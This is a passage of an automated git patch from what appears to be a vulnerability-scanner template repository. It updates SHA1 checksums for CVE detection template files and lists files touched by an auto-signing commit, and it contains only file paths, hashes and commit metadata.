+http/cves/2023/CVE-2023-42442.yaml:5b93bd3379eb1286c01369b8ac0db7274951a209 +http/cves/2023/CVE-2023-42793.yaml:7609627dfc943e8a98e63a223c2666acbe6f88be +http/cves/2023/CVE-2023-43177.yaml:3fc70b3e12cd6c102e9a912a5ec99deda74fb2d9 +http/cves/2023/CVE-2023-43187.yaml:bc5c5b9d077e21da92d16d832b6bdfbaa107b85b +http/cves/2023/CVE-2023-43208.yaml:9571171f304a06c1e2e175e83f87717c7574d327 +http/cves/2023/CVE-2023-43261.yaml:353153b24243a42ec58e7d82b93ca737b0f44081 +http/cves/2023/CVE-2023-43325.yaml:dea8bfbceeb76f9949bcbe3953c866b40e42b9f6 +http/cves/2023/CVE-2023-43326.yaml:e65d5e0574b5dbb97f7f15499a1dfd45cc9bd8af +http/cves/2023/CVE-2023-43374.yaml:4390a5192fbce5dcd0ae6cbaea3baac59ea72a17 +http/cves/2023/CVE-2023-43795.yaml:04fb141516ef06b963bd3c63b4b41f3e901f6b54 +http/cves/2023/CVE-2023-4415.yaml:ef3f313e45a4a534af38945a6409948358549ae3 +http/cves/2023/CVE-2023-44352.yaml:2f065bd348decd9a4ef21471a01821dfd7e64e74 +http/cves/2023/CVE-2023-44353.yaml:29dc295e3d7d42134ad3c53ce51c6f2263134055 +http/cves/2023/CVE-2023-4451.yaml:c5b9465bf0dc2e2f9631d686d15d0e616cb4489d +http/cves/2023/CVE-2023-44812.yaml:ee661e9f8e533aadb1b5646815991b454d5f1a50 +http/cves/2023/CVE-2023-44813.yaml:f8897152666aadf2fb7a52d8317115f24321b469 +http/cves/2023/CVE-2023-4521.yaml:cd4aff1800214d7703661498ae91ee2101070b4a +http/cves/2023/CVE-2023-45375.yaml:36bdf1a241658b6b389fe31a66d62e913d9217dd +http/cves/2023/CVE-2023-4542.yaml:7796c7d2400f3188394c96d287f226ee141b7d0b +http/cves/2023/CVE-2023-4547.yaml:757165c5376f308ea1d88713aa90b620c94b6949 +http/cves/2023/CVE-2023-45542.yaml:fbab2269d3d329f1ac722842d4852760eb4a33f4 +http/cves/2023/CVE-2023-45671.yaml:44371e98ac18a13b6f4913a31db8b25bf8a6976f +http/cves/2023/CVE-2023-4568.yaml:499f357c250a5fe0e30c20955f817a63c4ead9a6 +http/cves/2023/CVE-2023-45852.yaml:b6e39de864aba6e0fe97f4a681d46e2f3a364238 +http/cves/2023/CVE-2023-45855.yaml:ea4416c0b3b510bbe87c43955e30a945834d1566 +http/cves/2023/CVE-2023-4596.yaml:0cd82451c3af3de042fb9028a37d07e9cf29983a +http/cves/2023/CVE-2023-4634.yaml:9911ff9ad5e096083e2f8082a22b868aa7f261a3 +http/cves/2023/CVE-2023-46347.yaml:bb0f1e67bb28da1b426e41802d4bb0d6f61035ec +http/cves/2023/CVE-2023-46359.yaml:e099ca11dccb079f80b7a6a2f428506692b5bc83 +http/cves/2023/CVE-2023-46574.yaml:d047c8594bd07e24c92dce889e0c211c73b7dd22 +http/cves/2023/CVE-2023-46747.yaml:70d00d50e355533780d4855cf0360b20144f8afc +http/cves/2023/CVE-2023-46805.yaml:49bde9b8955972ec5ac1dd765914358605c31f92 http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 -http/cves/2023/CVE-2023-4714.yaml:954bbf773a17e757e0e6643ef410202037e7c8f1 -http/cves/2023/CVE-2023-47211.yaml:bf40361838f0afc267bc6c62161b3f0526a2b234 -http/cves/2023/CVE-2023-47218.yaml:17dcf8eb7f320608649c5031de12070b46a11ebf -http/cves/2023/CVE-2023-47246.yaml:87b56eba15f5c19a9a03e679fb770600520ea2d1 -http/cves/2023/CVE-2023-47643.yaml:77261db868e2b2788787eb158eb22f6238707b3c +http/cves/2023/CVE-2023-4714.yaml:9e54ad7ef07ff844f390a7b8b884063dd3491f74 +http/cves/2023/CVE-2023-47211.yaml:e1381355d1efad0bda01b17816a75d6df2972bb3 +http/cves/2023/CVE-2023-47218.yaml:b0c24c4a4961ef70ed0cd35250c8c70f00cde6fd +http/cves/2023/CVE-2023-47246.yaml:04af302e2804cdab8c72c3a73c19b91db29a646c +http/cves/2023/CVE-2023-47643.yaml:0eea9fe823d7a83cb7b1399798a95d421841fa63 http/cves/2023/CVE-2023-48023.yaml:4df3bf24775e2c4cd1e3225aaed8e9ab7ee2c73e -http/cves/2023/CVE-2023-48084.yaml:45180a45c8d4bb126de978c630e437e3b5be4861 +http/cves/2023/CVE-2023-48084.yaml:b5181539e5c575cfeac27ad62e94f9e2459b7ced http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 -http/cves/2023/CVE-2023-49070.yaml:ea832772cb56e40e0acc8527138089777b673f16 -http/cves/2023/CVE-2023-49103.yaml:8eab68a4f41466e6d9bef692647cc9e86969bd49 -http/cves/2023/CVE-2023-4966.yaml:14102dfbda787ccbbd24875179e48acbdae04643 -http/cves/2023/CVE-2023-4973.yaml:fd42b4708183812b84a950edadb28cd74acf7664 -http/cves/2023/CVE-2023-4974.yaml:d7a5386c5971e13babc28e9f346991ef0e82fba2 -http/cves/2023/CVE-2023-49785.yaml:37c94b4ef0f6b07d703d372d1e5a0841e9a3184e -http/cves/2023/CVE-2023-5003.yaml:f7da2dff91d97d8c63abb7faf35019a0bb73906a -http/cves/2023/CVE-2023-50290.yaml:993704655d9bb469f8ea073c9757676b3ee1468f -http/cves/2023/CVE-2023-5074.yaml:7b27fc2c3a6ecd3375ca4faf384c14cc480f859c -http/cves/2023/CVE-2023-5089.yaml:143e9400b53b44e4fca7cdd97d47add25ac940b6 -http/cves/2023/CVE-2023-50917.yaml:3cbb771d64638cd5a059e46d07b3b4d7d7748285 -http/cves/2023/CVE-2023-50968.yaml:bab623e4b6cb88b943b91d6825d34d007503754b -http/cves/2023/CVE-2023-51467.yaml:9878c789d7c85882dd19de5043facfc96af7ea1e -http/cves/2023/CVE-2023-52085.yaml:aa1fc00f87c229fda933d8738697fe6899c791ec -http/cves/2023/CVE-2023-5244.yaml:32f7df605dda4c16610c548f773673f5b69c67a5 -http/cves/2023/CVE-2023-5360.yaml:2ab7c61990737a8776592831e8189ff751935ab9 -http/cves/2023/CVE-2023-5375.yaml:1a1f06afcd795e901f9320cb7eafed3583078598 -http/cves/2023/CVE-2023-5556.yaml:39a19e3bf6a7d46ee8f9d2550dfe7ed8f3ba2413 -http/cves/2023/CVE-2023-5830.yaml:7e762d6ffa5d98900695ddf94f70b095cd54ee62 -http/cves/2023/CVE-2023-5914.yaml:e569de3f31b3f9b4affbeac019dc42e7e4b6a0a3 -http/cves/2023/CVE-2023-5991.yaml:2760a58a352d55a71ad7a177100f0513a82ed6c3 -http/cves/2023/CVE-2023-6018.yaml:eb0a236252c640180f594627bfb873c35a398fd6 -http/cves/2023/CVE-2023-6020.yaml:bb2f91071bd7ca0a284f7a15d68288e499f1f427 -http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 -http/cves/2023/CVE-2023-6023.yaml:c537c8a9c6bae27008abc07163a9f67f083e77c1 -http/cves/2023/CVE-2023-6038.yaml:38ab1d22eb9a68f42042f232196bd556273e75e1 -http/cves/2023/CVE-2023-6063.yaml:ce30538ac7371880f65b9247ca0da8dd6e844c05 -http/cves/2023/CVE-2023-6065.yaml:5583e9a287accbae3c6b84b7f5b4c3e4105e4cea -http/cves/2023/CVE-2023-6114.yaml:fb42b31775be2bbad24ddc15474b08d1d5a14341 -http/cves/2023/CVE-2023-6360.yaml:02f33c56e0b2c876afb8067605ecea59372947b6 -http/cves/2023/CVE-2023-6379.yaml:6ebc677324ecc29a9012474f6228f27be950dee0 -http/cves/2023/CVE-2023-6380.yaml:24e6506046fab035c83ce942b572d9389c88df15 -http/cves/2023/CVE-2023-6389.yaml:a7849d4aba637c66da0d3d08b08158b6ccfcd27d -http/cves/2023/CVE-2023-6553.yaml:7976983a9d94d1562386621c7528c4e1af07ee89 -http/cves/2023/CVE-2023-6567.yaml:83818566ad0764aa9933b7f1905075c40b645479 -http/cves/2023/CVE-2023-6623.yaml:182c33805efba63a9f987417b6e13ce81c8643e9 -http/cves/2023/CVE-2023-6634.yaml:d517962a1689dbbaefe2ea502e451ba9009f1dd5 -http/cves/2023/CVE-2023-6831.yaml:d1a44c75188bceced79fce8fe5b7f31e1e824e4b -http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60 -http/cves/2023/CVE-2023-6895.yaml:280030bb44a21b5263dd9f29092154566d82fde7 -http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f -http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 -http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 -http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac -http/cves/2024/CVE-2024-0195.yaml:8e306f17c007cae746c4d60abb6b6ee5e6189485 -http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f -http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 -http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe -http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 -http/cves/2024/CVE-2024-0337.yaml:a0259282bfc67ee1b2339ea3af3bd295baa59cc3 -http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 -http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241 +http/cves/2023/CVE-2023-49070.yaml:65e0930328b458ab7e4213c9782efa52b73fb507 +http/cves/2023/CVE-2023-49103.yaml:f5757f90f945c79084ee7a8e4431ccf8bdecc58c +http/cves/2023/CVE-2023-4966.yaml:1a39adf34b4332b05432f084bdda7d88bfb899c4 +http/cves/2023/CVE-2023-4973.yaml:9d8c23669f0b1fb8ef2f819f6ff0df9e838816d6 +http/cves/2023/CVE-2023-4974.yaml:95265a132c2a648c8f300f6b598af0090ed6b7a8 +http/cves/2023/CVE-2023-49785.yaml:3c952b09c12553c59b87955301943b4a7571bc8f +http/cves/2023/CVE-2023-5003.yaml:44df345838430a46851567849110fb4ec89e1e2f +http/cves/2023/CVE-2023-50290.yaml:0da1226999b17e405296b4e45193b418fda58f26 +http/cves/2023/CVE-2023-5074.yaml:e03366c2de9746143fb284e90422d9cf4b2c684a +http/cves/2023/CVE-2023-5089.yaml:ab5fdcebc0ea3196856dc0b6bfe7b95c5e27a366 +http/cves/2023/CVE-2023-50917.yaml:183f41d5151e36eaadb744564a2f3e9dd830b72e +http/cves/2023/CVE-2023-50968.yaml:b1faf39acf862d06ffda53e8710e8cf1afae17e8 +http/cves/2023/CVE-2023-51467.yaml:c0eb1dcb70d547279a1e26e464acea6f9332ae0a +http/cves/2023/CVE-2023-52085.yaml:f1a43c0e82be4e6ae94f5403b92df1173f1a7786 +http/cves/2023/CVE-2023-5244.yaml:7c81d0654ee6997857ff2bc8db90c9ed2ce2b2f5 +http/cves/2023/CVE-2023-5360.yaml:5a0953946a042f7a8fd406380fa54b3088f7f643 +http/cves/2023/CVE-2023-5375.yaml:0ec7f1a46cd93b5d2d78086baccb701fa2af2207 +http/cves/2023/CVE-2023-5556.yaml:b6c708adff651f31ba82db7bc458982513ebe287 +http/cves/2023/CVE-2023-5830.yaml:58fcd24876880ad298f4b9827096c3f95d443577 +http/cves/2023/CVE-2023-5914.yaml:a7a4abc8e632a96c541984a6e47b834f1a931037 +http/cves/2023/CVE-2023-5991.yaml:71a29af2239b64d52ad3aa7bb799c284d74ac2f1 +http/cves/2023/CVE-2023-6018.yaml:0cf547ac6737dc4aec9443e34e331cd477e63f34 +http/cves/2023/CVE-2023-6020.yaml:12c27a4b3c8ba5a23f1deaa5a751adbdde5aca0e +http/cves/2023/CVE-2023-6021.yaml:78b6bcae9d5a27f05380dccf231430030f86b377 +http/cves/2023/CVE-2023-6023.yaml:647fa12f828736a1e60899d855c2ee3413776f04 +http/cves/2023/CVE-2023-6038.yaml:edbf511e8df255d81032508ae0db5da0878e9306 +http/cves/2023/CVE-2023-6063.yaml:3aff55fe4445b86e5ef515902a0460a5a683440a +http/cves/2023/CVE-2023-6065.yaml:43d54ded80789f0d3854c9f6a8af5f2a4d745be1 +http/cves/2023/CVE-2023-6114.yaml:f90be5554fc97d768bfb627c3a898da9663f8db4 +http/cves/2023/CVE-2023-6360.yaml:6e0753aac7b53d1c7bc9ae41a078eb0582912162 +http/cves/2023/CVE-2023-6379.yaml:613d522af5db85c143fdcc2b38dfaa26ca136ef0 +http/cves/2023/CVE-2023-6380.yaml:859a707d6c9c81e4c3e8781a3beff189b51c8f49 +http/cves/2023/CVE-2023-6389.yaml:d0ed9d0fd87114fa3f29d8a4165d42fe6c79f343 +http/cves/2023/CVE-2023-6553.yaml:b2e33e3f496ce2052a849e370f8a9f4f52e619f2 +http/cves/2023/CVE-2023-6567.yaml:1d4f79dc0de243eab84fc5ac41220aac35476c2e +http/cves/2023/CVE-2023-6623.yaml:95a28cb42b74962a876414ea6387f16836f5ba48 +http/cves/2023/CVE-2023-6634.yaml:58d0acfc67990c665c1a4dd288d7735aab2a1999 +http/cves/2023/CVE-2023-6831.yaml:6660cec376c2fd84924762f057aaf7739a8e7afc +http/cves/2023/CVE-2023-6875.yaml:3b87c1cc3387c7eefb5a420057312c9416d4e191 +http/cves/2023/CVE-2023-6895.yaml:7ff1cccef6008880bb745da89ab0776719f590c9 +http/cves/2023/CVE-2023-6909.yaml:7f1c1674a74c530291653e3e4af3a8a7064b8176 +http/cves/2023/CVE-2023-6977.yaml:62a94baffe86139a9983e2b81d2b6bb522ab72d1 +http/cves/2023/CVE-2023-6989.yaml:fb7348efce4dfc99db7b9a2d0216d4c6cba74f6e +http/cves/2023/CVE-2023-7028.yaml:5e8b05b284c13ecabce6ee3c42d1804054abdb56 +http/cves/2024/CVE-2024-0195.yaml:9a92a4d8719e68413de8d1fade2119e0a623f21d +http/cves/2024/CVE-2024-0200.yaml:62d03d5fdc128f489257fefda03aa4ac148b510a +http/cves/2024/CVE-2024-0204.yaml:c94c5ccdd259b91be5958278994a3f6e228c0eef +http/cves/2024/CVE-2024-0235.yaml:a22bdc7ca804a6d0311f17c87cce6d5cf903825f +http/cves/2024/CVE-2024-0305.yaml:6bf530b827ae9684e18b3fbf2ae8210d0f724155 +http/cves/2024/CVE-2024-0337.yaml:f77b7bd1d93eda04a6aaf94f99ac1766cceda25c +http/cves/2024/CVE-2024-0352.yaml:c262817270ffae9efcec3d8996ea81f3f7b8b3fe +http/cves/2024/CVE-2024-0713.yaml:68de9c6afca59de5238a26024c82547a6ba57cea http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 -http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7 +http/cves/2024/CVE-2024-1021.yaml:81d7ffc9d132b673f7757d6b08c2dbd2847a0f9b http/cves/2024/CVE-2024-1061.yaml:df85be53c1a8e56e06eb9abf580e173b7d9b984d -http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c +http/cves/2024/CVE-2024-1071.yaml:3af798153fa941a00376b2dc03502960fbc1f36d http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 -http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 -http/cves/2024/CVE-2024-1209.yaml:27b88d76f172f9a3c7c01d857a8dd533409f030e -http/cves/2024/CVE-2024-1210.yaml:a67c76ea90033f3feb482819f4f7174e76a4c3af +http/cves/2024/CVE-2024-1208.yaml:287c09eb17c7864442f835df934c7f4dfa4d520a +http/cves/2024/CVE-2024-1209.yaml:aed0338ee5cf0a1a0ba5e259d5afa5fd9b088df4 +http/cves/2024/CVE-2024-1210.yaml:7eb962fcb42e13310c5eed2005e9d72ba1acacdc http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe -http/cves/2024/CVE-2024-1561.yaml:a134c8864733abe3278ebb6cf67a54c36b6ae29f +http/cves/2024/CVE-2024-1561.yaml:1d7ea0ff7ffee2714ab6c591394b11cd5151eab6 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 -http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 -http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d -http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 -http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 -http/cves/2024/CVE-2024-21683.yaml:1e5be00ea45b6b0b78b88c83572f346333c3feaf -http/cves/2024/CVE-2024-21887.yaml:a3fd62da315d80a98fc1b4d8101d6b65babf26df -http/cves/2024/CVE-2024-21893.yaml:7ac92ba24a2d8b42594efe52a920aca9a9dd760b -http/cves/2024/CVE-2024-22024.yaml:9a4da0db5d10fde48c88f49e52f798220ceea7db -http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d +http/cves/2024/CVE-2024-1709.yaml:af397b8d43398034dfb882a890a13219e972ffdb +http/cves/2024/CVE-2024-20767.yaml:624154e090933ad51bbcb882a5bd52fbf70928cd +http/cves/2024/CVE-2024-21644.yaml:1f73c9ae6bf21e7ca3d0cfabb439ef772287aa7b +http/cves/2024/CVE-2024-21645.yaml:d371558dd931ed3b6eec1e8e7401ca4a0f8b6319 +http/cves/2024/CVE-2024-21683.yaml:4d37563c0e58c53b849999c96fafb1fe173b4ede +http/cves/2024/CVE-2024-21887.yaml:7ded7fecbf1bdede573928e97c3d48f1b6db2a17 +http/cves/2024/CVE-2024-21893.yaml:403d9491255a70d1fd5ae5b41ef554adf01888eb +http/cves/2024/CVE-2024-22024.yaml:d53fc0281004592753093a77fedd54322bc7526d +http/cves/2024/CVE-2024-22319.yaml:727a1cab59ca03b93d1e120f1768ccefd5bbeed4 http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb -http/cves/2024/CVE-2024-22927.yaml:55eada76a32a5cb2d7c30cebb426f9efb40a0c7c +http/cves/2024/CVE-2024-22927.yaml:7f2ddc59d05ee8143e928a3a0fdebe32fa8376a1 http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe -http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7 +http/cves/2024/CVE-2024-2340.yaml:8b4e6176085fd2e23294d24fe4ad16623e6c04d2 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 -http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed -http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba -http/cves/2024/CVE-2024-24919.yaml:6e739858871f091c64f572ebffcb7df982653993 +http/cves/2024/CVE-2024-23917.yaml:30e3c4167ab654c921a0099ca71173f3aaa4efb6 +http/cves/2024/CVE-2024-24131.yaml:92521d7f06cc522caf757cf4955580a6ce81f11c +http/cves/2024/CVE-2024-24919.yaml:dc70da2422a62df9120e90019f4b177f82b9637a http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 -http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c -http/cves/2024/CVE-2024-26331.yaml:b6da693b9295d093562406851e50dedfe5a136c9 -http/cves/2024/CVE-2024-27198.yaml:2dd81bcb6348757082509db91768889a3725f1e2 +http/cves/2024/CVE-2024-25735.yaml:6cb37a640b41863066cfcc9d917f6da3bca178ef +http/cves/2024/CVE-2024-26331.yaml:09399db8fb7ac4ae716c9b1d7a25a73727288132 +http/cves/2024/CVE-2024-27198.yaml:ef5197d6f52235dfa22a237ec3ba7b1dfdaf5492 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 -http/cves/2024/CVE-2024-27956.yaml:6642a8487441523926a0828c54b333ba9737522f -http/cves/2024/CVE-2024-28255.yaml:dd2f4a52d0d4f9af3c6a6fc10a917e99e8f0717d -http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 +http/cves/2024/CVE-2024-27956.yaml:183826f7991890e37661f393a43e76714418b327 +http/cves/2024/CVE-2024-28255.yaml:4e37fca1899d0664c6cc28b4d4ce66301db56ab2 +http/cves/2024/CVE-2024-28734.yaml:c947ad89f7a1c41c08be582fe05bfaf52e52784b http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b -http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 -http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a -http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc -http/cves/2024/CVE-2024-3097.yaml:4185bbc6b136c6f1674cf35e66d4c4142e75bb0e -http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d +http/cves/2024/CVE-2024-2879.yaml:1682b1027f2599bfed61d6922b4ad1e7af2963e7 +http/cves/2024/CVE-2024-29059.yaml:f36dad1af1afa0f510ee81e4cd653d23223988e8 +http/cves/2024/CVE-2024-29269.yaml:5a971a5e38e628cd7af595e83ff531ad9b912694 +http/cves/2024/CVE-2024-3097.yaml:061fb056a1993b992d863ec26cd78d368fe58473 +http/cves/2024/CVE-2024-3136.yaml:f41042c96e9dbb187c897bfb9b4fd4b0a82ca732 http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc -http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 -http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea -http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba +http/cves/2024/CVE-2024-31848.yaml:784556c618c53d8d471b21fc04f3a040cc96f492 +http/cves/2024/CVE-2024-31849.yaml:d34bdd05da8c050a14fe72bb8dc7f54e45242250 +http/cves/2024/CVE-2024-31850.yaml:9ad703db727ec444a5579104f225275e1e626ddf http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf -http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d +http/cves/2024/CVE-2024-32399.yaml:e7baf7a6e22f175cc2f3b236ef68853cdf814506 http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 -http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 +http/cves/2024/CVE-2024-3273.yaml:14cd3a5d8b64e3e05dccebedbebc95045bcfdc2d http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab -http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b -http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 -http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c +http/cves/2024/CVE-2024-33575.yaml:cffffecf77c06ef57f987b130b2e8f28dd272b19 +http/cves/2024/CVE-2024-33724.yaml:620bb7553b4cef24c012f5a3a3655c0ee8146c78 +http/cves/2024/CVE-2024-3400.yaml:2bd600db500bb43b0afc7d7e694df41eeceb143f http/cves/2024/CVE-2024-34470.yaml:a5518a2ed26dd99303e2e20f7356eece7f2dc927 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 -http/cves/2024/CVE-2024-3822.yaml:e70a67d151ade654abc8ca4a6bc9d296073d6123 -http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 -http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b +http/cves/2024/CVE-2024-3822.yaml:3b09a61773b3f696a26e7a152cfa5d1968aa9dc8 +http/cves/2024/CVE-2024-4040.yaml:0ec0a0dcbc9149db436ec147018574d574f45b25 +http/cves/2024/CVE-2024-4348.yaml:bbab477b0fd48166cf20c7a11b381830042bc34d http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -8614,7 +8614,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7699d41e3854e2471b4942f0947e77c3fb0259ea +templates-checksum.txt:6eb1cefac9f148d20991468437446ac844aca82d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e8cb13b60c3776a35ae57d1cf81963416b4782f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 06:53:00 +0000 Subject: [PATCH 565/847] Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: --- http/cves/2000/CVE-2000-0114.yaml | 2 +- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2004/CVE-2004-1965.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-3010.yaml | 2 +- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-1547.yaml | 2 +- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4764.yaml | 2 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6080.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 2 +- http/cves/2009/CVE-2009-0545.yaml | 2 +- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 2 +- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 2 +- http/cves/2010/CVE-2010-0157.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 2 +- http/cves/2010/CVE-2010-0467.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 2 +- http/cves/2010/CVE-2010-1305.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 2 +- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1494.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- 